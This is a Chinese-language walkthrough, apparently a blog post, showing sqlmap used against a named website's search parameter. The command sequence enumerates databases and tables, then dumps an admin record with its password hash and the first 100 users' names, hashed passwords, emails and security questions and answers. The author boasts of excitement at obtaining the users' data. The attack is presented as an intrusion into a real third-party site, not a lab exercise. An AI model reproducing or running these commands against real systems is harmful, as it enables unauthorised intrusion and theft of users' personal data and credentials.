SQLMAP是一款開源的滲透測試程序,它可以自動探測和利用SQL注入漏洞來獲得我們想要的數據。我們可以利用它執行特定的命令、查看文件、獲取各種數據;當然,最猥瑣的是它利用注入點拖庫的速率還是灰常讓人滿意的。
滲透開始-->
注入點:"http://so.126disk.com/search?key=A"
測試環境:?BackTrack?5??/???SQLMAP?0.9
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dbs
//?列舉數據庫?-->?126disk?,?information_schema
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--current-db
//?當前數據庫?-->?126disk
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--users
//?列數據庫用戶
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--current-user
//?當前用戶
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--tables?-D?"126disk"
//?列舉數據庫126disk的表名
獲取表名
+---------------------+
disk_admin
disk_adminlog
disk_adminmsg
disk_collection
disk_count
disk_file
disk_gonggao
disk_guolv
disk_haoyou
disk_integral
disk_integrallog
disk_jubao
disk_link
disk_links
disk_message
disk_mulu
disk_search
disk_server
disk_tag
disk_type
disk_user
disk_userlog
disk_visitors
disk_zhuanji
+----------------------+
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--columns?-T?"disk_admin"?-D?"126disk"
//?獲取表disk_admin的列名
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dump?-C?"id,login,pass,user"?-T?"disk_admin"?-D?"126disk"
//?獲取表disk_admin中的數據,包含列?id,login,pass,user???-->?1|9|admin|8e8df10cbce2ef46c3d25c3a5f7fe159
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--columns?-T?"disk_user"?-D?"126disk"
//?獲取表disk_user的列名
當看到這些列名時,心中是莫名的激動。里面可都是注冊用戶的數據啊
#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dump?-C?"id,name,pass,email,wenti,daan"?-T?"disk_user"?-D?"126disk"?--start?1?--stop?100
//?獲取表disk_user的前100條數據,包含id,name,pass,email,wenti,daan;這里已經開始拖庫了
SQLMAP是非常人性化的,它會將獲取的數據存儲在/pentest/web/scanners/sqlmap/output/so.126disk.com/dump/126disk/
補充:?在獲取數據的過程中會詢問是否破解HASH密碼,這里選擇n,我們不急于破解密文
